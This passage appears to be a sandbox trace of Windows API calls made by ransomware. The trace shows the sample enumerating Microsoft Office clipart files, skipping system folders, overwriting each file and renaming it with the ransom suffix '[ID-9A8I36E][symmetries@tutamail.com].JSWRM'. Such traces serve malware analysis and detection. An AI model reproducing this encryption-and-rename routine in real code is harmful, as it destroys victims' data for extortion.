RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0099.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0099.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0099.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0099.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0099.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01842_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01842_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01842_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01842_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0099.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0099.765] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12d1, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01843_.GIF", cAlternateFileName="")) returned 1 [0099.765] lstrcmpiW (lpString1="WB01843_.GIF", lpString2=".") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="..") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="...") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="windows") returned -1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="recovery") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="perflogs") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="documents and settings") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="system volume information") returned 1 [0099.766] lstrcmpiW (lpString1="WB01843_.GIF", lpString2="msocache") returned 1 [0099.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0099.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01843_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01843_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01843_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0099.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01843_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01843_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01843_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0099.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0099.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0099.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01843_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01843_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.767] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4817) returned 1 [0099.767] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12d0) returned 0x205850 [0099.767] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x12d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x12d0, lpOverlapped=0x0) returned 1 [0099.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.768] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x12d0, lpOverlapped=0x0) returned 1 [0099.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.769] CloseHandle (hObject=0x314) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0099.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0099.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0099.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0099.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0099.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.769] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01843_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01843_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01843_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01843_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0099.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0099.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0099.770] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110c9494, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x102b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB02229_.GIF", cAlternateFileName="")) returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2=".") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="..") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="...") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="windows") returned -1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="recovery") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="perflogs") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="documents and settings") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="system volume information") returned 1 [0099.770] lstrcmpiW (lpString1="WB02229_.GIF", lpString2="msocache") returned 1 [0099.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02229_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02229_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02229_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02229_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02229_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02229_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0099.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0099.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0099.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB02229_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb02229_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.772] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4139) returned 1 [0099.772] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1020) returned 0x205850 [0099.772] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1020, lpOverlapped=0x0) returned 1 [0099.773] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.773] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1020, lpOverlapped=0x0) returned 1 [0099.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.774] CloseHandle (hObject=0x314) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0099.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0099.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0099.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0099.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0099.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.774] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB02229_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb02229_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB02229_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb02229_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0099.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0099.775] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110c9494, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WHIRL1.WMF", cAlternateFileName="")) returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2=".") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="..") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="...") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="windows") returned -1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="recovery") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="perflogs") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="documents and settings") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="system volume information") returned 1 [0099.775] lstrcmpiW (lpString1="WHIRL1.WMF", lpString2="msocache") returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0099.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL1.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL1.WMF", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHIRL1.WMF", lpUsedDefaultChar=0x0) returned 10 [0099.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0099.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL1.WMF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WHIRL1.WMF", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WHIRL1.WMF", lpUsedDefaultChar=0x0) returned 10 [0099.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0099.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\whirl1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.777] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2582) returned 1 [0099.777] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa10) returned 0x20c6c0 [0099.777] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa10, lpOverlapped=0x0) returned 1 [0099.778] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.778] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa10, lpOverlapped=0x0) returned 1 [0099.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0099.779] CloseHandle (hObject=0x314) returned 1 [0099.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0099.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0099.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0099.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0099.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0099.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0099.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0099.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.779] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\whirl1.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WHIRL1.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program 